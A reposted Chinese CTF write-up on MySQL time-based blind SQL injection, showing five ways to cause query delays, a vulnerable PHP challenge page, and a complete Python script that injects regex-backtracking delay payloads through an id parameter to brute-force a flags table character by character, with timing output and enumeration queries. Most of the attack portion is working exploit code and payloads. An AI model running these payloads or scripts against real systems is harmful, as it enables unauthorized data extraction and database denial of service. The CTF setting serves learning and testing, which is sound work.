【转】MySQL时间盲注五种延时方法-安全小百科

author:cdxy

PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数，引发对时间盲注中延时方法的思考。

延时函数

<br />
mysql> select sleep(5);<br />
+———-+<br />
| sleep(5) |<br />
+———-+<br />
|        0 |<br />
+———-+<br />
1 row in set (5.00 sec)

mysql> select sleep(5);

+—————+

| sleep(5) |

+—————+

| 0 |

+—————+

1 row in set (5.00 sec)

<br />
mysql> select benchmark(10000000,sha(1));<br />
+—————————-+<br />
| benchmark(10000000,sha(1)) |<br />
+—————————-+<br />
|                          0 |<br />
+—————————-+<br />
1 row in set (2.79 sec)

mysql> select benchmark(10000000,sha(1));

+——————————————+

| benchmark(10000000,sha(1)) |

+——————————————+

| 0 |

+——————————————+

1 row in set (2.79 sec)

<br />
mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C; +————+ | count(*) | +————+ | 2651020120 | +————+ 1 row in set (1 min 51.05 sec)

1	mysql> SELECT count() FROM information_schema.columns A, information_schema.columns B, information_schema.tables C; +——————+ \| count() \| +——————+ \| 2651020120 \| +——————+ 1 row in set (1 min 51.05 sec)

延时精确可控，利用环境有限，需要开两个session测试。

SESSION A

<br />
mysql> select get_lock(‘test’,1);<br />
+——————–+<br />
| get_lock(‘test’,1) |<br />
+——————–+<br />
|                  1 |<br />
+——————–+<br />
1 row in set (0.00 sec)

mysql> select get_lock(‘test’,1);

+——————————+

| get_lock(‘test’,1) |

+——————————+

| 1 |

+——————————+

1 row in set (0.00 sec)

SESSION B

<br />
mysql> select get_lock(‘test’,5);<br />
+——————–+<br />
| get_lock(‘test’,5) |<br />
+——————–+<br />
|                  0 |<br />
+——————–+<br />
1 row in set (5.00 sec)

mysql> select get_lock(‘test’,5);

+——————————+

| get_lock(‘test’,5) |

+——————————+

| 0 |

+——————————+

1 row in set (5.00 sec)

通过rpad或repeat构造长字符串，加以计算量大的pattern，通过repeat的参数可以控制延时长短。

<br />
mysql> select rpad(‘a’,4999999,’a’) RLIKE concat(repeat(‘(a.*)+’,30),’b’);<br />
+————————————————————-+<br />
| rpad(‘a’,4999999,’a’) RLIKE concat(repeat(‘(a.*)+’,30),’b’) |<br />
+————————————————————-+<br />
|                                                           0 |<br />
+————————————————————-+<br />
1 row in set (5.27 sec)

mysql> select rpad(‘a’,4999999,‘a’) RLIKE concat(repeat(‘(a.*)+’,30),‘b’);

+——————————————————————————————–+

| rpad(‘a’,4999999,‘a’) RLIKE concat(repeat(‘(a.*)+’,30),‘b’) |

+——————————————————————————————–+

| 0 |

+——————————————————————————————–+

1 row in set (5.27 sec)

PWNHUB-全宇宙最简单的PHP-Writeup

<br />
<?php<br />
require ‘conn.php’;<br />
$id = $_GET[‘id’];<br />
if(preg_match(“/(sleep|benchmark|outfile|dumpfile|load_file|join)/i”, $_GET[‘id’]))<br />
{<br />
    die(“you bad bad!”);<br />
}<br />
$sql = “select * from article where id='”.intval($id).”‘”;<br />
$res = mysql_query($sql);<br />
if(!$res){<br />
    die(“404 not found!”);<br />
}<br />
$row = mysql_fetch_array($res, MYSQL_ASSOC);<br />
mysql_query(“update view set view_times=view_times+1 where id = ‘”.$id.” ‘”);<br />
?>

<?php

require ‘conn.php’;

$id = $_GET[‘id’];

{

die(“you bad bad!”);

}

$sql = “select * from article where id='”.intval($id).“‘”;

$res = mysql_query($sql);

if(!$res){

die(“404 not found!”);

}

$row = mysql_fetch_array($res, MYSQL_ASSOC);

mysql_query(“update view set view_times=view_times+1 where id = ‘”.$id.” ‘”);

上面代码明显可从id参数注入代码到MySQL UPDATE语句。

从时间盲注的角度解，题中除过滤掉sleep和benchmark两个延时函数之外，并无其他限制。

思路：寻找新的延时函数

想到日常数据开发中自己的SQL中多次因正则消耗计算资源，又想到某次白帽大会上关于正则Dos的议题，然后开始朝RLIKE尝试。

<br />
concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b’

concat(rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b’

以上代码等同于 sleep(5)

本地测试

<br />
mysql> update view1 set cnt=cnt+1 where id=’1′ and IF(SUBSTR((select 5 from dual),1,1)=’5′,concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b’,0) and ‘1’=’1′;<br />
Query OK, 0 rows affected (5.08 sec)<br />
Rows matched: 0  Changed: 0  Warnings: 0</p>
<p>mysql> update view1 set cnt=cnt+1 where id=’1′ and IF(SUBSTR((select 5),1,1)=’1′,concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b’,0) and ‘1’=’1′;<br />
Query OK, 0 rows affected (0.00 sec)<br />
Rows matched: 0  Changed: 0  Warnings: 0

mysql> update view1 set cnt=cnt+1 where id=‘1’ and IF(SUBSTR((select 5 from dual),1,1)=‘5’,concat(rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b’,0) and ‘1’=‘1’;

Query OK, 0 rows affected (5.08 sec)

Rows matched: 0 Changed: 0 Warnings: 0

mysql> update view1 set cnt=cnt+1 where id=‘1’ and IF(SUBSTR((select 5),1,1)=‘1’,concat(rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b’,0) and ‘1’=‘1’;

Query OK, 0 rows affected (0.00 sec)

Rows matched: 0 Changed: 0 Warnings: 0

Docker起了个PHP 5.6+MySQL，代码copy过去，构建相同环境测试脚本，爆破到正确字符时，测试机会延时10s左右；遇到错误字符会在0.1s以内返回，可以明显区分。

本地测试执行version()的结果：

<br />
N  –  0.0232281684875<br />
O  –  0.0197539329529<br />
P  –  0.028028011322<br />
Q  –  0.0212018489838<br />
R  –  0.0244557857513<br />
S  –  0.0253188610077<br />
T  –  0.0281682014465<br />
U  –  0.0236928462982<br />
V  –  0.0221898555756<br />
W  –  0.0275118350983<br />
X  –  0.0206508636475<br />
Y  –  0.0258479118347<br />
Z  –  0.0194098949432<br />
@  –  0.0250370502472<br />
{  –  0.0211541652679<br />
}  –  0.0245869159698<br />
–  –  0.0192731937281<br />
_  –  0.0247149467468<br />
.  –  0.0188128948212<br />
Error or Finished.<br />
Current Result: 5.5.59-0ubuntu0.14.04.1[NULL][NULL]

N – 0.0232281684875

O – 0.0197539329529

P – 0.028028011322

Q – 0.0212018489838

R – 0.0244557857513

S – 0.0253188610077

T – 0.0281682014465

U – 0.0236928462982

V – 0.0221898555756

W – 0.0275118350983

X – 0.0206508636475

Y – 0.0258479118347

Z – 0.0194098949432

@ – 0.0250370502472

{ – 0.0211541652679

} – 0.0245869159698

– – 0.0192731937281

_ – 0.0247149467468

. – 0.0188128948212

Error or Finished.

Current Result: 5.5.59–0ubuntu0.14.04.1[NULL][NULL]

线上测试

线上就很蛋疼了。首先环境是每5min重启一次，每次只能在重启的瞬间(0.5s)打上10条请求，然后服务器就被用笛卡尔积的同学打挂了。

二分法懒得搞了，在脚本里加了一些纠错机制，线上环境正误尝试的时间差降为0.2s左右，但仍可以区分。

<br />
# !/usr/bin/env python<br />
#  -*- coding: utf-8 -*-<br />
import requests<br />
from requests.exceptions import ReadTimeout, ConnectionError<br />
from urllib import quote<br />
import time<br />
import re</p>
<p>payloads = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@{}-_.’</p>
<p>url = ‘http://52.80.179.198:8080/article.php?id=’<br />
# url = ‘http://localhost:8090/article.php?id=’</p>
<p># 替代sleep()<br />
# 14s<br />
# sleep_func = “concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'”</p>
<p># 5s<br />
sleep_func = “concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'”</p>
<p># 本地测试代码<br />
def run_local(query):<br />
    def brute_single_char(target_index):<br />
        for c in payloads:<br />
            payload = “1′ and IF(SUBSTR({},{},1)='{}’,{},0) and ‘1’=’1″.format(query, target_index, c, sleep_func)<br />
            confirm_cnt = 0<br />
            # print payload<br />
            for i in range(10000):  # 为了宕机重试<br />
                if confirm_cnt > 3:  # 连续四次正确尝试，保存结果<br />
                    print ‘FOUND!!! ‘ + c<br />
                    return c</p>
<p>                time_start = time.time()<br />
                try:<br />
                    req = requests.get(url + quote(payload), timeout=20)<br />
                    if ‘Warning’ in req.content:<br />
                        print req.content<br />
                    if ‘helloworld’ not in req.content:<br />
                        print c, ‘MySQL Down, retry…’<br />
                        # print req.content<br />
                        continue<br />
                except ReadTimeout:  # 时间长：正确尝试<br />
                    print c, ‘ – timeout, retry…’<br />
                    # confirm_cnt += 1<br />
                    continue<br />
                except ConnectionError:<br />
                    print c, ‘Web Server Down, retry…’<br />
                    continue</p>
<p>                # print ans.content<br />
                time_end = time.time()<br />
                print c, ‘ – ‘, time_end – time_start<br />
                if time_end – time_start < 5:  # 时间短：错误尝试<br />
                    # print ‘false:’ + c<br />
                    break<br />
                confirm_cnt += 1<br />
        return ‘[NULL]’  # 全部字母未命中</p>
<p>    result = ”<br />
    try:<br />
        for index in range(1, 100):<br />
            if len(re.findall(r'[NULL]’, result)) > 2:<br />
                print ‘Error or Finished. nCurrent Result: ‘ + result<br />
                return<br />
            result += brute_single_char(index)<br />
    except KeyboardInterrupt:<br />
        print result</p>
<p># 线上测试代码<br />
def run_sort(query):<br />
    def brute_single_char(target_index):<br />
        timelist = {}<br />
        for c in payloads:<br />
            payload = “1′ and IF(SUBSTR({},{},1)='{}’,{},0) and ‘1’=’1”.format(query, target_index, c, sleep_func)<br />
            for i in range(10000):  # 为了宕机重试<br />
                time_start = time.time()<br />
                try:<br />
                    req = requests.get(url + quote(payload), timeout=2)<br />
                    if ‘helloworld’ not in req.content:<br />
                        continue<br />
                except ReadTimeout:<br />
                    print c, ‘ – timeout, retry…’<br />
                    continue<br />
                except ConnectionError:<br />
                    continue</p>
<p>                time_end = time.time()<br />
                print c, ‘ – ‘, time_end – time_start<br />
                timelist[c] = time_end – time_start<br />
                break<br />
        if not len(timelist):<br />
            return ‘[NULL]’  # 全部字母未命中<br />
        rec = sorted(timelist.items(), key=lambda item: item[1])<br />
        print rec<br />
        return rec[-1]</p>
<p>    result = []<br />
    try:<br />
        for index in range(7, 100):<br />
            print ‘________INDEX {}_______’.format(index)<br />
            result.append(brute_single_char(index))<br />
            if result[-1] is ‘[NULL]’:<br />
                print ‘Error or Finished. nCurrent Result: ‘<br />
                print result<br />
                return<br />
    except KeyboardInterrupt:<br />
        print result</p>
<p>if __name__ == ‘__main__’:<br />
    run_sort(‘(select * from flags)’)

100

101

102

103

104

105

106

107

108

109

110

111

112

113

# !/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

from requests.exceptions import ReadTimeout, ConnectionError

from urllib import quote

import time

import re

payloads = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@{}-_.’

url = ‘http://52.80.179.198:8080/article.php?id=’

# url = ‘http://localhost:8090/article.php?id=’

# 替代sleep()

# 14s

# sleep_func = “concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'”

# 5s

sleep_func = “concat(rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’),rpad(1,999999,’a’)) RLIKE ‘(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'”

# 本地测试代码

def run_local(query):

def brute_single_char(target_index):

for c in payloads:

payload = “1′ and IF(SUBSTR({},{},1)='{}’,{},0) and ‘1’=’1”.format(query, target_index, c, sleep_func)

confirm_cnt = 0

# print payload

for i in range(10000): # 为了宕机重试

if confirm_cnt > 3: # 连续四次正确尝试，保存结果

print ‘FOUND!!! ‘ + c

return c

time_start = time.time()

try:

req = requests.get(url + quote(payload), timeout=20)

if ‘Warning’ in req.content:

print req.content

if ‘helloworld’ not in req.content:

print c, ‘MySQL Down, retry…’

# print req.content

continue

except ReadTimeout: # 时间长：正确尝试

print c, ‘ – timeout, retry…’

# confirm_cnt += 1

continue

except ConnectionError:

print c, ‘Web Server Down, retry…’

continue

# print ans.content

time_end = time.time()

print c, ‘ – ‘, time_end – time_start

if time_end – time_start < 5: # 时间短：错误尝试

# print ‘false:’ + c

break

confirm_cnt += 1

return ‘[NULL]’ # 全部字母未命中

result = ”

try:

for index in range(1, 100):

if len(re.findall(r‘[NULL]’, result)) > 2:

print ‘Error or Finished. nCurrent Result: ‘ + result

return

result += brute_single_char(index)

except KeyboardInterrupt:

print result

# 线上测试代码

def run_sort(query):

def brute_single_char(target_index):

timelist = {}

for c in payloads:

payload = “1′ and IF(SUBSTR({},{},1)='{}’,{},0) and ‘1’=’1”.format(query, target_index, c, sleep_func)

for i in range(10000): # 为了宕机重试

time_start = time.time()

try:

req = requests.get(url + quote(payload), timeout=2)

if ‘helloworld’ not in req.content:

continue

except ReadTimeout:

print c, ‘ – timeout, retry…’

continue

except ConnectionError:

continue

time_end = time.time()

print c, ‘ – ‘, time_end – time_start

timelist[c] = time_end – time_start

break

if not len(timelist):

return ‘[NULL]’ # 全部字母未命中

rec = sorted(timelist.items(), key=lambda item: item[1])

print rec

return rec[–1]

result = []

try:

for index in range(7, 100):

print ‘________INDEX {}_______’.format(index)

result.append(brute_single_char(index))

if result[–1] is ‘[NULL]’:

print ‘Error or Finished. nCurrent Result: ‘

print result

return

except KeyboardInterrupt:

print result

if __name__ == ‘__main__’:

run_sort(‘(select * from flags)’)

以下爆破结果中，3为正确结果，其余为错误结果。

<br />
1  –  0.0639481544495<br />
2  –  0.0795040130615<br />
3  –  0.3621571064<br />
4  –  0.0846300125122<br />
5  –  0.0894010066986<br />
6  –  0.0945949554443<br />
7  –  0.0842099189758<br />
8  –  0.0861508846283<br />
9  –  0.0922508239746

1 – 0.0639481544495

2 – 0.0795040130615

3 – 0.3621571064

4 – 0.0846300125122

5 – 0.0894010066986

6 – 0.0945949554443

7 – 0.0842099189758

8 – 0.0861508846283

9 – 0.0922508239746

之后依次执行以下代码get flag（跑了多少个小时我也不知道。。。）

<br />
select count(*) from article -> 3</p>
<p>database() -> post</p>
<p>select count(table_name) from information_schema.tables where table_schema=’post’ -> 3</p>
<p>select length(table_name) from information_schema.tables where table_schema=’post’ and table_name<>’article’ and table_name<>’view’ —> 5</p>
<p>select table_name from information_schema.tables where table_schema=’post’ and table_name<>’article’ and table_name<>’view’ -> flags</p>
<p>select count(*) from flags -> 1</p>
<p>select * from flag

select count(*) from article -> 3

database() -> post

select count(table_name) from information_schema.tables where table_schema=‘post’ -> 3

select length(table_name) from information_schema.tables where table_schema=‘post‘ and table_name<>‘article‘ and table_name<>‘view‘ —> 5

select table_name from information_schema.tables where table_schema=‘post‘ and table_name<>‘article‘ and table_name<>‘view‘ -> flags

select count(*) from flags -> 1

select * from flag

相关推荐: 火种CTF-writeup

暑期有空参加了火种CTF的比赛，比赛总的来说不是很难，但是web部分遇到了很多困难，不过cryto较为简单，全部做出来了。逆向是一如既往的放弃，我要开始好好学逆向了~ 附比赛的wp: 传送门：火种CTF-wp 相关推荐: 利用java复现 ES文件浏览器 CV…

文章版权归作者所有，未经允许请勿转载。

THE END